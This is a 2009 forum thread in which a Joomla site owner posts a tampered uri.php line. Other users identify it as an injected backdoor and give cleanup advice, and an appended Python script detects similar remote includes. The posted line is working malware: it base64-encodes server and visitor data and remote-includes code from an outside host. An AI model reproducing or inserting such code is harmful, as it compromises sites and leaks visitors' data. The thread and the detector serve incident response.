Parse error, syntax error

Posted: Fri Jun 26, 2009 3:06 pm
by vlastanovak
Hi guys,

I've not had any problems in the past and my site has been operational for months - I also haven't made any changes to my site in weeks... BUT all of a sudden I am getting the following error message when trying to access my Joomla installation:

Code:

Parse error: syntax error, unexpected '"', expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/ausnzcla/public_html/libraries/joomla/environment/uri.php on line 741

So I have isolated the line and the line is:

Code:

$regex = "<^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>";

Does anyone have any idea where the error is?

SITE URL:ausnzclancentral . com See next post!!

Thanks.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 7:51 pm
by icesolid
Please re-post this with [code][/code] so I can read your code better.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 8:00 pm
by McInfo
WARNING: Do not run the script posted above and do not click on the link.

You have been hacked! The script is attempting to send your server variables to a Russian site, behgazzazbzefa.users.phpinclude.ru. Fortunately, the hacker was sloppy and edited the script in a way that causes a parse error, so it is possible that the edited script has never run and none of your users' IP addresses have been sent to the hacker's site. Unfortunately, you have a security hole that allowed the hacker to change your files.

Reinstall Joomla or restore uri.php by replacing it with a clean copy. Download Joomla here. Save the hacked copy for forensic evidence. Find the security hole.

Edit: This post was recovered from search engine cache.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:02 pm
by Eric!
That's a strange place in the code to put in a hack (source in link).
http://api.joomla.org/__filesource/fsou ... i.php.html

I would assume you might have other hidden hacks in your site as well.

One hole in Joomla itself is a serious admin password hack in 1.5.0 and fixed recently in 1.5.6.
http://www.website-ideas.co.uk/2009/02/ ... joomla-15/

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:36 pm
by vlastanovak
So what would you advise I do? Can I re-install Joomla without losing my DB data or template?

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 10:52 pm
by McInfo
Your database should not be affected by reinstalling the scripts, but make a backup just in case. I have not worked with Joomla, so I don't know how its installer operates (I'm assuming it has one).

You should be able to make a copy-backup of your template and put it back in the templates folder after reinstalling Joomla. However, your template files may have also been compromised by the attack. So, if you can, install a clean copy of the template.

Edit: This post was recovered from search engine cache.

Re: Parse error, syntax error

Posted: Fri Jun 26, 2009 11:10 pm
by Eric!
Joomla may not have been how they got in either. Check the file date on uri.php and look for other files with similar change/mod times...assuming the hacker was sloppy. Also check your raw log files for suspicious access to your site. Change all your passwords too. If your database had unencrypted passwords you need to get your users to change them as the database could have been copied.

It wouldn't hurt to notify your host of the details as they are sometimes willing to help analyze and monitor your account. Sometimes attacks can come from users sharing the host server with you and they found a way into your files.
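
Added example (not posted by anyone in this thread): a Python triage script for the two checks suggested above, listing PHP files modified close in time to the tampered uri.php and flagging lines where an include/require is built from base64_decode() or a literal URL, as in the injected line. The function names, the one-hour window, the regex heuristic and the sample tree are assumptions of this example.

```python
import os
import re
import tempfile

# Heuristic (an assumption of this example): an include/require whose argument,
# before the next ';', calls base64_decode() or holds a literal http(s):// URL.
REMOTE_INCLUDE = re.compile(rb"\b(?:include|require)(?:_once)?\b[^;]{0,200}?"
                            rb"(?:base64_decode\s*\(|[\"']https?://)", re.I)

def php_files(root):
    """Yield every PHP-like file under root."""
    for dirpath, _dirs, names in os.walk(root):
        yield from (os.path.join(dirpath, n) for n in names
                    if n.lower().endswith((".php", ".phtml", ".inc")))

def modified_near(root, reference, window=3600):
    """Other PHP files whose mtime is within `window` seconds of reference's."""
    ref = os.path.abspath(reference)
    ref_mtime = os.stat(ref).st_mtime
    return sorted(p for p in php_files(root)
                  if os.path.abspath(p) != ref
                  and abs(os.stat(p).st_mtime - ref_mtime) <= window)

def remote_include_hits(root):
    """(path, line number) for each line that matches REMOTE_INCLUDE."""
    hits = []
    for path in php_files(root):
        with open(path, "rb") as fh:
            hits += [(path, n) for n, line in enumerate(fh, 1)
                     if REMOTE_INCLUDE.search(line)]
    return sorted(hits)

def build_sample(root):
    files = {  # constructed sample tree: name -> (content, mtime)
        "uri.php": (b'<?php\ninclude_once(base64_decode("aHR0cDovLw==")."host.invalid/?".$s);\n', 1_000_000),
        "index.php": (b"<?php\nrequire_once 'uri.php';\n", 1_000_600),
        "old.php": (b"<?php\n$x = base64_decode($y);\n", 500_000),
    }
    for name, (content, mtime) in files.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(content)
        os.utime(path, (mtime, mtime))
    return os.path.join(root, "uri.php")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        ref = build_sample(tmp)
        print(modified_near(tmp, ref), remote_include_hits(tmp))
```

File modification times can be reset by whoever changed the files, so an empty result from modified_near() does not show the rest of the tree is clean; comparing against a fresh copy of the same Joomla release is the stronger check.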